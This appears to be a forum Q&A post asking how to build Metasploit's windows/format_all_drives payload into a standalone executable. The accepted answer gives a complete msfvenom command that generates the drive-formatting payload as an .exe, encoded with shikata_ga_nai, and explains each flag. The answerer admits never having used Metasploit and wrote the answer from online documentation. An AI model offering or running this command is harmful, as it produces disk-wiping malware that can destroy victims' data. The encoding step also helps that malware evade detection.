# How can I generate a binary from an payload without any other addons?

Tags: exploit, metasploit, exploit-development, msfvenom

For example how do I turn the `payload/windows/format_all_drives` into an exe without any other fancy addons?

(I am talking about using msfvenom FYI)

Answer (score 2, accepted):

It's as simple as:

```
msfvenom -a x86 --platform windows -p windows/format_all_drives -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
```

where the `-a` option is used to specify the architecture, the `-p` option is used to specify the payload, the `-e` option is used to specify the encoder, the `-f` option is used to specify the output format (`exe`in this case) and the `-o` option is used to specify the file to write the binary to.

---

Note: I have never used metasploit in my life and wrote this answer purely from [this](https://www.offensive-security.com/metasploit-unleashed/binary-payloads/) and [this](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) (found by a simple google search).